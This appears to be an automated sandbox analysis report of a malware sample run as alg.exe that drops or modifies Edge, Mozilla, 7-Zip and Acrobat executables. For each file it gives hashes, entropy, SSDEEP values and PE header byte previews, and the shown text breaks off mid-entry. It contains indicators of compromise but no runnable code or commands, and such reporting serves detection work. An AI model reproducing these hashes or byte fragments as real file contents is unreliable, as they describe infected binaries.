Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1847808
Entropy (8bit):	7.145472255420402
Encrypted:	false
SSDEEP:	24576:/iD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:6D2VmAyiwIb8boQNDmg27RnWGj
MD5:	CDD5D13E54A248B01424DCF8469002BE
SHA1:	69328F142601F4DB40E6B315D97A849ACD2755B0
SHA-256:	434864220E3A95B2E16E8064C07FE4AF202603F9C3A51AD532B93CAF4E19803E
SHA-512:	FFD80B2417F3859BF3AF9AE536A6A653D532DA88B7543CEDE3E9E812984F3F3862D16F41764363B13440A843C74E8CC0C8DF2DD54CADD600606D4562B10AD6FD
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......:..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..\|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	7.166351331210893
Encrypted:	false
SSDEEP:	24576:gwNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:gwNPdQO7BJTfmE8Dmg27RnWGj
MD5:	28A0B0AA186605F96D04404D4151B22C
SHA1:	8DA1155DDCA55C5328203560FF15FB72B8080AFF
SHA-256:	78759CD4B404903D384D6E4DB9BD856C3217C6ECD01573F5DC6307706171E449
SHA-512:	92158A3484889382F01963C77EDFBB1F0A40C5B2B34B6BD55E6E99677EC1E45A9DB77877BE0A65961E169BCD4AB5A14250A7C61E7C8F62627F07E35ABAB820D9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.....................................^.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1325568
Entropy (8bit):	5.141851327415734
Encrypted:	false
SSDEEP:	24576:L4lbht6BHMsqjnhMgeiCl7G0nehbGZpbD:slNtqH4Dmg27RnWGj
MD5:	4670DB935555DE4A4E44B500737EAF01
SHA1:	B061F09B498625A8F6B64F4FB0E6F1FB3D6DACED
SHA-256:	C8DCEC0198B846E3EAF77CE6815E66E040E4A87C518E7F5CACC9FD393970446B
SHA-512:	7B278280F35E7A4CF732EF713A7451C7A23D3801D60298503636801D4DDB1EF55F102D24A42D857562C81B338D185C8C2359D5FAFEE77F2B3DE480E5F6B2C34A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.........................................................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138861798078089
Encrypted:	false
SSDEEP:	12288:dIkOkTB+wAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:dIxkTBVAsqjnhMgeiCl7G0nehbGZpbD
MD5:	E7C61940AE6C6A3934FC3ADADCEB7332
SHA1:	0432EF95C20EF79885EA2A531432C73FF05C91F2
SHA-256:	21CC241E73D24626A022E557D1E73CBCF5278B7BD064802F88026C54899F4859
SHA-512:	9BB0969511BE494565272A769037FA63D0FBB26C88C97E785B78995B6C06C46685F98F26FBC196F158AFCA5814A3CAB77F48D004BDB1B96D8B9D28AAD077F575
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@..................................8......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335296
Entropy (8bit):	5.236785399158018
Encrypted:	false
SSDEEP:	12288:+4lssmroCfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:+cssmr1sqjnhMgeiCl7G0nehbGZpbD
MD5:	B224ECA84192D52880C73523DD5CF69C
SHA1:	06E00502CE8BD931E85DB0D0A79E9DF701EC0BFE
SHA-256:	0761640E37FBB74DCAFF37380EC206FF9449B8C91F05DBCF53C2FC80F12CCD49
SHA-512:	FA5FEE1067C49EB986A3FAA47AF4B3B6BD1BC92F04F140A928D778274638DAFBEFA41AFE2112655ACC42315D8CA2B581FE173E5C08BD63BA9562A14F7A2985CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	5.338529050193238
Encrypted:	false
SSDEEP:	24576:T03cT++foSBWU2YxhkgCsqjnhMgeiCl7G0nehbGZpbD:w3cK+foQWU2YnPGDmg27RnWGj
MD5:	43525D9D0A1EDBE310C90AD0B92F8EAB
SHA1:	2C850D1F8E6934EF5621A3FE47316577E4D61959
SHA-256:	055AB197EBA22EFAA84CA4880E446C728DD1EC2B73070E3423FA019B4F88AEAA
SHA-512:	AB8EDD77E5BC640048E523EB91339119247F9A5924B19A184BDB1CDE894CC63166FE4C68183E31E8421C1CF13D860D29E096224E010466FCE57DFCFA8144A87E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138909560390616
Encrypted:	false
SSDEEP:	12288:obrNRzB+NiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:obBRzBgisqjnhMgeiCl7G0nehbGZpbD
MD5:	599326A4E34F3EA26E91F34169AB882D
SHA1:	569211EEB7E15AB408DECFE15378041AB0586DC4
SHA-256:	8B7BC65EE20275662212276C978BB336789EF52190D89CDECBF9AF212BDB297C
SHA-512:	C116B07913A946F5473EFA84395AA87E779EB0280C7BF6491908095E9A4F5E891863B987F16017F6C946096C007A7FCF009E9B2665B5FF178062D242B3D4818F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@..................................Z..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.940556710373971
Encrypted:	false
SSDEEP:	49152:By53w24gQu3TPZ2psFkiSqwozkDmg27RnWGj:ByFQgZqsFki+ozkD527BWG
MD5:	0346B8120BDB01B5C1D236FA9433825E
SHA1:	08657F600C74E790223D5D5345BAF98975EB8E33
SHA-256:	1151ACF101DEFA8409ED40EB02920F1455BB3C6969FD1171DB78E1B1B4A63079
SHA-512:	4FECD5168861E40F5AA66715FA28D42CA226C05C6D9032DED8B6C3A155306807CED80FA6478C296B4C188FB2EBEF6F2481F2BCF886C4E939410115FE97E1FB50
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......a!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.854930889457472
Encrypted:	false
SSDEEP:	24:ed9C6R3WtoWmI+8UWqovFWlbZW07Y4WqN+9OWcv+lwgMYW0a:e+6RmtmlWNvg2Rq49xn6D
MD5:	1F747060BEA8CD11D9B3BF5F8EA8780A
SHA1:	41DE2CA17B26829CA944CF89EC54058C9387E305
SHA-256:	4A45CED980FE0909AFE7A3EBA11CBD3BF15D75388EEACD58A32B410FC267E7CE
SHA-512:	2B397B73EA6DF7ABD582E27DBBB0F89DF8CBDE446290E5F1FA4E4B09F3799B6DFBFCFDF13AC01B345A796B3008B5AB85EE31DFF783A22BC2DD2B395DAEB45171
Malicious:	false
Reputation:	unknown
Preview:	2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-28 00:41:03-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-28 00:41:03-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-28 00:41:03-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-28 00:41:0

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347829285789429
Encrypted:	false
SSDEEP:	24576:0QVTZu0J5sqjnhMgeiCl7G0nehbGZpbD:LVTZu8Dmg27RnWGj
MD5:	93C1838CCC468A3F28E0FBEA5291818F
SHA1:	023C24EACC0B6E499BC3D9AFD3CEADE7B6B2EE2F
SHA-256:	C0BA12EFE10B8B1A4CBB8E8D91F762B834B6FEF5B889BCD4E50E203A44BC11A3
SHA-512:	A43EC07CBE44F34CE499D4F2CB4532F9DA9BFDC414952D6CFE32C969775D76020279B3E3B2E2FC53B0885C92EB8F5DB50E85C8CD6F41E066713B4B5AAFF51AE3
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......83.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	5.623112533854092
Encrypted:	false
SSDEEP:	24576:Y+gkESfh4CoasqjnhMgeiCl7G0nehbGZpbD:FgkE+SYDmg27RnWGj
MD5:	C4382D47E9D52A020F1EDFFAC1892684
SHA1:	0A60C755F3B141A52142845D111BDD1623E40033
SHA-256:	1818FC093DC2B01916AB1303D2E68EF1BEE4942BBBBEAC579BA238866ED20914
SHA-512:	AD81FA12B9814E13FD62107951DAFC4B9BE52A128B1ACB55911AF124C950F2A36EE32A06B5D7C2E7B90B7C21E8200388DF5A300C2DB41FCB4802B09A5DE4E899
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ......?..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.096628789917978
Encrypted:	false
SSDEEP:	24576:BBpDRmi78gkPXlyo0GtjrRsqjnhMgeiCl7G0nehbGZpbD:TNRmi78gkPX4o0GtjJDmg27RnWGj
MD5:	5F936EA7C55B56F44610AF3E4B560301
SHA1:	7A7F4BE263556D921AB3DB2148DBF1E3AAE55EB9
SHA-256:	432973A3247FB9E5E79720B526E65E179993CDB004048688429514655B2220D3
SHA-512:	0E22C7B9D7EDD9CD3B9C277CA64698B4F76B77593D9A0462DBF1969217A9E81B9EB77CF2E4794D4F67140923D625D04758602EFAAC4624A9F15A7F84664E1091
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.229033139051404
Encrypted:	false
SSDEEP:	24576:DLOS2oTPIXVasqjnhMgeiCl7G0nehbGZpbD:9/TRDmg27RnWGj
MD5:	817240DFB1DC31DD547CD92881B29FFF
SHA1:	FAE08507B512ACC121656D141F24934AD1BE19CF
SHA-256:	0D405A7DF52CE66947DB55B0ED362B2A3E63CC96EC25BE7029E409300352F2D7
SHA-512:	AC5D13DC4D222073D8F1095BF8686207C3DE5A2A6AFFBE0928D790B08A491D6D1423C5C5F3497BD93DAC3649879F592B1B1816BA82CF2F03AA64702CD90F20C2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................n.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	5.031193568806078
Encrypted:	false
SSDEEP:	12288:F1MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:F1MsqjnhMgeiCl7G0nehbGZpbD
MD5:	015B752C0A701D0AC152E50C98869D1E
SHA1:	F864154C91A0FCE82B8CF698BCC57A788CCF3850
SHA-256:	842F54B85FAF313797417FC844F1494C0BD168594EE22377CD2521A55FAD78ED
SHA-512:	D802D1C9BB6D4D817BE62DF2B1AF37E7A7405F4CBAE9C7FBC476469FD58642AE576682A33A963951B92827C67E838C2D7A2BF33A6750DB29F9731812156DCFBC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................s.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.712000933369577
Encrypted:	false
SSDEEP:	12288:JRudzLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JAdzLsqjnhMgeiCl7G0nehbGZpbD
MD5:	7FAF27E6C6DF4E3DCE53000E6B4CD091
SHA1:	E45DEED5F103677B552EE0A8B519484EFEEA4F32
SHA-256:	EEA5410204A532A7530D696EE8DADD8A7C75630642ABAC440858466DACFBA29D
SHA-512:	A51BB2FB656EC39F97F751A30283A768342D3B079C9B88D26EE9A067B030BED12537115AD5227F62B7FB974053B87BD497862682FE8E0BB903491596E2EC3734
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................(..... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1457664
Entropy (8bit):	5.082142735524897
Encrypted:	false
SSDEEP:	12288:dvnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hsqjnhMgeiCl7G0nehbGZpbD
MD5:	AC30B7A5848293BE6E622B673D630A50
SHA1:	9BF7AA235C2D5E71A7B9543AF9BFD8CABC2C83AF
SHA-256:	84DC882472851F4FDCC7BC2B08AEAC129001B9DE7C21401ED6339C47116AF959
SHA-512:	B7B902CBC5934161D0BDB942DBBE06B4CD25D72C6B81AEB99F6392732D6BAB13C2632F763320D40E819FB71D426D5C6EAE215CF23388780DC96D300A5062A575
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@....................................0>.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1461248
Entropy (8bit):	5.468607263812358
Encrypted:	false
SSDEEP:	24576:o5zhM1XSE+sqjnhMgeiCl7G0nehbGZpbD:2Ms/Dmg27RnWGj
MD5:	422B3D95761E52BCC14C356C7B20BA64
SHA1:	3C513D59128C5345DFE6600A3695B14390EB6E95
SHA-256:	04380DD3C3A1F5CE5D3D52B65C59F53BE82F18ACC9223359FE9E4818AB0ACB39
SHA-512:	ADA899FAB1C6774257C7EBDC6E87336CDC5CD7AAF8254BF945590A8D419A88CDB783D3833AB35E5FF97B694B7454CA69A547D74E3FCF88DCEB74033A0968DC39
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................H..... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499774598251266
Encrypted:	false
SSDEEP:	49152:vtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755dDmg27RN:vjEIa4HIEWOc5zD527BWG
MD5:	18ECA48A0220E4538A8E1A286CC9E273
SHA1:	00365A81F4AE70F376D8FC4950659CE94515CAC9
SHA-256:	A589D87CBE2D3BCAD61F45C974F8ED932BD871A4F51D34208989A1B9FC867955
SHA-512:	37385809F7FA7033C38D405D10D45A38BF29F203498EF6F7CD8F6032604630B9F2A35432FBA3E7AFBEC0E23E9EF060426FE8CEB8E9F11B9C33D759401F46D1F9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......"@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367289752994
Encrypted:	true
SSDEEP:	1572864:KQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:BXhwMhe6AABPiQwF6xQ22R
MD5:	8F75768E255B3989FCC6CFA420EAFD7A
SHA1:	047DF11CEBB07DFAA22A904264DF952F513A999A
SHA-256:	A4FF718ADF8B8FF7A1C6EC8229CB1806AC9F2C887BA66328E288FF5186170ED3
SHA-512:	3F1B6F4BE0E788E14B8E2CBE8EDB3B0F2B75A99657325C6D68CFD4CC192C997971DD81316EB6DB2863D5FA641893FC6FA9661329EFE35EEACC6E51059DF6251F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1180160
Entropy (8bit):	5.0848024403384855
Encrypted:	false
SSDEEP:	12288:kW3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kOsqjnhMgeiCl7G0nehbGZpbD
MD5:	759271B91EAF4B47A1D7B093F691949D
SHA1:	83C25AF6176297CF5658E0E0E64524C4A9BDA2C1
SHA-256:	7A53577F6E44497C046DCAC1D2038D2FAA72E2ADFAAB72E213E19B2F0E6C3A1B
SHA-512:	8DB6F5FDD5D3BA990774A474A201E415C2F3C39667643402A5DC509DED1C0F502DBF25C519EFED78C135C4B45D43BF61F8226E4FCD6367F6934A15FF15B3E3B8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.38670072974857
Encrypted:	false
SSDEEP:	49152:sDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXZ:1nN9KfxLk6GEQTX5UKzNDgD527BWG
MD5:	EE1772C5C5CD7530FAC2C8C93BA5A667
SHA1:	BBEE565ADEFEC1EF97113DFE58411A18D5E288BC
